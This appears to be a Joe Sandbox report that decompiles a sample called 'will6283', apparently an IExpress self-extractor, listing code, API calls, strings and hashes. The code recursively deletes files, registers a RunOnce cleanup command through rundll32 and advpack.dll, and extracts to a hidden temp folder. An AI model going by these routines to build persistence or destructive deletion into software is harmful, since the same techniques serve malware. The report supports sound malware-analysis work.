Opcode ID: 8086a881c8b9c340cf7334341f62dcb008fddedec6be5d8c53b06af0a3faabaf
Instruction ID: 89d528162242f029185395d9d9f706642690de59244279a43d71aa2e0d264121
Opcode Fuzzy Hash: 8086a881c8b9c340cf7334341f62dcb008fddedec6be5d8c53b06af0a3faabaf
Instruction Fuzzy Hash: 1E41E930A00306DAFB71AB799C5469A37ECAB54754F0040A9FEC5CB556EB7AC584CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 01062390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E01062390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x1068004; // 0x19e58fb5
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E01066CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E01061680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E010616B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E01061680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E010616B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E010616B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0106658A( &_v280, 0x104, 0x1061140);
								E01062390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x01062398
0x0106239e
0x010623a3
0x010623a5
0x010623ae
0x010623b3
0x010624cb
0x010624d2
0x010624d3
0x010624d4
0x010624df
0x010623c2
0x010623d1
0x010623db
0x010623e4
0x010623f6
0x010623fc
0x01062401
0x00000000
0x00000000
0x00000000
0x00000000
0x01062407
0x01062407
0x01062408
0x01062411
0x0106241f
0x0106247a
0x01062483
0x01062495
0x010624a3
0x01062421
0x0106242f
0x01062453
0x0106245d
0x01062466
0x01062472
0x01062472
0x0106242f
0x010624af
0x010624b5
0x010624be
0x010624c5
0x00000000
0x010624c5

APIs

FindFirstFileA.KERNELBASE(?,01068A3A,010611F4,01068A3A,00000000,?,?), ref: 010623F6
lstrcmpA.KERNEL32(?,010611F8), ref: 01062427
lstrcmpA.KERNEL32(?,010611FC), ref: 0106243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 01062495
DeleteFileA.KERNEL32(?), ref: 010624A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 010624AF
FindClose.KERNELBASE(00000000), ref: 010624BE
RemoveDirectoryA.KERNELBASE(01068A3A), ref: 010624C5

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: efbeadbe5bbd53191ed98582b7a60dbde997aad3c9cc91c65024f28b179fef04
Instruction ID: c080865a7513add5f3595b491da2748f6cefdd1714581d0ba4d4e7a5b61ca7ec
Opcode Fuzzy Hash: efbeadbe5bbd53191ed98582b7a60dbde997aad3c9cc91c65024f28b179fef04
Instruction Fuzzy Hash: 7E316F31704641EBD330EBA8CC89AEB77ECABD8305F04492DF5D58B294EF7999098752

Uniqueness

Uniqueness Score: -1.00%

Function 01062BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E01062BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x106a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x1069124 = 0;
				if(E01062CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E01062F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E010652B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x1068a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x1069a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E01061F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x1068588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x1069124; // 0x80070002
				return _t7;
			}

0x01062c03
0x01062c0d
0x01062c18
0x01062c20
0x01062c2e
0x01062c32
0x01062c36
0x01062c3d
0x01062c43
0x01062c45
0x01062c47
0x01062c49
0x01062c4e
0x01062c4e
0x01062c47
0x01062c32
0x01062c20
0x01062c50
0x01062c54
0x01062c57
0x01062c64
0x01062c66
0x01062c6b
0x01062c6d
0x01062c74
0x01062c76
0x01062c7c
0x01062c7e
0x01062c87
0x01062c89
0x01062c89
0x01062c87
0x01062c7c
0x01062c74
0x01062c8e
0x01062c95
0x01062c98
0x01062c98
0x01062c9e
0x01062ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,01066BB0,01060000,00000000,00000002,0000000A), ref: 01062C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,01066BB0,01060000,00000000,00000002,0000000A), ref: 01062C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 01062C28
CloseHandle.KERNEL32(00000000,?,?,01066BB0,01060000,00000000,00000002,0000000A), ref: 01062C98

Strings

HeapSetInformation, xrefs: 01062C22
Kernel32.dll, xrefs: 01062C13

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: d248a4ae0992c5e24c448392cdf0133072deb310beaeffbb46ac3d6aadc0c5e2
Instruction ID: 7c2b4ced7f7c3d31cd895d8b656dc0919018941e6aa2db4cdee725e2d2228258
Opcode Fuzzy Hash: d248a4ae0992c5e24c448392cdf0133072deb310beaeffbb46ac3d6aadc0c5e2
Instruction Fuzzy Hash: F711AC7170030A9BE7307BF99848A673FDD9B847A4B044055FAC5F725CDA3AD8518750

Uniqueness

Uniqueness Score: -1.00%

Function 01066F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01066F40() {

				SetUnhandledExceptionFilter(E01066EF0); // executed
				return 0;
			}

0x01066f45
0x01066f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 01066F45

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e0521690b43803dfc93823899a467cbcc37021b94ae0548f9551679d1dd939a3
Instruction ID: 65b2c8184e4816319e5cd150c415a8662e4b9f336ed8c0556c37021baf10e081
Opcode Fuzzy Hash: e0521690b43803dfc93823899a467cbcc37021b94ae0548f9551679d1dd939a3
Instruction Fuzzy Hash: B6900270351100C797202B719D1941575955A4D6427815464E091DD458DB7690405651

Uniqueness

Uniqueness Score: -1.00%

Function 0106202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0106202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x1068004; // 0x19e58fb5
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E01066CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0106171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0106658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x1069a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x10691e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x10691e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x10691e5);
						if(_t90 != 0) {
							 *0x1068580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
							E0106171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E010644B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0106658A( &_v268, 0x104, 0x1061140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x1068530 = _t66;
				goto L23;
			}

0x0106202a
0x01062035
0x0106203c
0x01062041
0x01062050
0x0106205f
0x01062064
0x0106206f
0x0106208c
0x01062094
0x01062257
0x01062266
0x01062266
0x0106209a
0x0106209b
0x0106209d
0x010620aa
0x010620af
0x010620c9
0x010620d1
0x00000000
0x00000000
0x010620d3
0x010620da
0x00000000
0x00000000
0x00000000
0x010620da
0x010620e2
0x01062103
0x0106210e
0x01062116
0x01062122
0x01062128
0x0106212c
0x01062179
0x01062194
0x010621de
0x010621e4
0x01062256
0x01062256
0x00000000
0x01062256
0x01062196
0x01062196
0x0106219c
0x0106219f
0x0106219f
0x010621a1
0x010621a2
0x010621a6
0x010621a8
0x010621b0
0x010621b0
0x010621b2
0x010621b3
0x010621bc
0x010621c7
0x010621cb
0x010621f1
0x010621f6
0x010621fd
0x010621ff
0x010621ff
0x01062204
0x01062213
0x01062218
0x0106221d
0x0106221d
0x01062220
0x01062220
0x01062222
0x01062223
0x01062229
0x0106223d
0x01062249
0x01062250
0x00000000
0x01062250
0x010621d2
0x010621d9
0x00000000
0x010621d9
0x0106213a
0x01062141
0x01062144
0x0106214c
0x00000000
0x00000000
0x01062163
0x01062172
0x01062172
0x00000000
0x01062163
0x010620ea
0x010620f0
0x00000000

APIs

memset.MSVCRT ref: 01062050
memset.MSVCRT ref: 0106205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0106208C

Part of subcall function 0106171E: _vsnprintf.MSVCRT ref: 01061750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010620C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010620EA
GetSystemDirectoryA.KERNEL32 ref: 01062103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01062122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 01062134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01062144
GetSystemDirectoryA.KERNEL32 ref: 0106215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0106218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010621C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010621E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0106223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01062249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01062250

Strings

wextract_cleanup1, xrefs: 010620A5, 010620BE, 010620F0, 01062232
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 01062082
%s /D:%s, xrefs: 010621FF, 01062210
advpack.dll, xrefs: 01062109
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010621A8, 01062204
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 010621F6
wextract_cleanup%d, xrefs: 0106209E
DelNodeRunDLL32, xrefs: 0106212E

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
API String ID: 178549006-3073904943
Opcode ID: 03f20efef3a5489ad2df6aaaa5782b2aaec3840431257d84c8ff2b741cfc45fd
Instruction ID: 88b800b4443ebad23a9c6d197a17f9288cd820386d8fffbd0f4515ee5b54f038
Opcode Fuzzy Hash: 03f20efef3a5489ad2df6aaaa5782b2aaec3840431257d84c8ff2b741cfc45fd
Instruction Fuzzy Hash: D4511571A00215FBEB30AB64DC48FEB7B7CEB50700F0041A9FAC5EB155EA769E848B50

Uniqueness

Uniqueness Score: -1.00%

Function 010655A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E010655A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x1068004; // 0x19e58fb5
				_v8 = _t28 ^ _t110;
				_t2 = E0106468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0106468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x1069a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x1068b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x1068a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E01066517(_t82, 0x7d2, 0, E01063210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x1069a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x10691e4;
									_t40 = GetTempPathA(0x104, 0x10691e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E01061781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E01066952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0106597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E01062630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0106658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x10691e4;
																					E01061781(0x10691e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E01065467(0x10691e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E01062630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0106597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E01065467(0x10691e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x10691e4;
											_t70 = E01062630(0, 0x10691e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x10691e4;
												_t71 = E01065467(0x10691e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0106597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x1068b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E01065467(0x1068b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E010644B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E010644B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x1069124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E010644B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x1069124 = E01066285();
					L2:
					_t38 = 0;
				}
				L47:
				return E01066CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x010655ab
0x010655b2
0x010655c9
0x010655d5
0x010655d9
0x01065600
0x01065605
0x0106560a
0x0106560c
0x01065638
0x01065641
0x01065643
0x01065645
0x01065645
0x0106564c
0x01065652
0x01065657
0x01065659
0x01065696
0x0106569c
0x0106589f
0x010658a7
0x010658ac
0x010658b3
0x010658b5
0x010656a2
0x010656a2
0x010656a8
0x00000000
0x010656ae
0x010656ae
0x010656b9
0x010656bf
0x010656c1
0x010656f3
0x010656f3
0x01065705
0x0106570a
0x01065711
0x01065717
0x01065724
0x01065726
0x01065729
0x01065730
0x01065737
0x0106573d
0x01065740
0x00000000
0x00000000
0x00000000
0x00000000
0x0106572b
0x0106572b
0x0106572e
0x01065742
0x01065742
0x01065745
0x0106576b
0x0106576b
0x00000000
0x01065747
0x01065747
0x0106574d
0x0106574f
0x01065771
0x01065771
0x01065773
0x00000000
0x01065751
0x01065751
0x01065753
0x00000000
0x01065755
0x0106575b
0x01065760
0x01065762
0x00000000
0x01065764
0x01065764
0x01065769
0x0106577e
0x0106577e
0x01065781
0x01065788
0x0106578d
0x0106578f
0x010657b2
0x010657b8
0x010657bd
0x010657bf
0x010657cd
0x010657cd
0x010657dd
0x010657e3
0x010657ef
0x010657f5
0x010657f8
0x0106580a
0x0106580a
0x010657fa
0x01065802
0x01065802
0x0106580d
0x0106580f
0x01065830
0x01065836
0x0106583d
0x0106584b
0x01065851
0x01065855
0x0106585a
0x0106585c
0x00000000
0x0106585e
0x0106585e
0x00000000
0x0106585e
0x01065811
0x01065817
0x01065819
0x0106581f
0x00000000
0x0106581f
0x01065791
0x01065797
0x0106579c
0x0106579e
0x00000000
0x010657a0
0x010657a9
0x010657ae
0x010657b0
0x00000000
0x00000000
0x00000000
0x00000000
0x010657b0
0x0106579e
0x00000000
0x00000000
0x00000000
0x01065769
0x01065762
0x01065753
0x0106574f
0x00000000
0x00000000
0x00000000
0x0106572e
0x00000000
0x01065864
0x01065864
0x01065864
0x01065717
0x00000000
0x010656c3
0x010656c5
0x010656c9
0x010656ce
0x010656d0
0x00000000
0x010656d6
0x010656d6
0x010656d8
0x010656dd
0x010656df
0x00000000
0x010656e1
0x010656e2
0x010656e4
0x010656e6
0x010656eb
0x010656ed
0x00000000
0x010656f3
0x010656f3
0x00000000
0x0106586c
0x01065878
0x0106587e
0x01065882
0x01065883
0x01065889
0x0106588e
0x0106588e
0x00000000
0x01065896
0x010656ed
0x010656df
0x010656d0
0x010656c1
0x010656a8
0x0106565b
0x0106565b
0x0106565d
0x01065669
0x01065669
0x0106565f
0x0106565f
0x01065665
0x01065667
0x00000000
0x00000000
0x01065667
0x0106566c
0x01065673
0x01065678
0x0106567a
0x0106589b
0x0106589b
0x01065680
0x01065685
0x0106568c
0x00000000
0x0106568c
0x0106567a
0x0106560e
0x01065613
0x0106561a
0x01065620
0x01065626
0x00000000
0x01065626
0x010655db
0x010655e0
0x010655e7
0x010655f1
0x010655f6
0x010655f6
0x010655f6
0x010658b7
0x010658c7

APIs

Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
Part of subcall function 0106468F: SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
Part of subcall function 0106468F: LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
Part of subcall function 0106468F: LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
Part of subcall function 0106468F: memcpy_s.MSVCRT ref: 010646E5
Part of subcall function 0106468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010655CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 01065638
LocalFree.KERNEL32(00000000), ref: 0106564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 01065620

Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
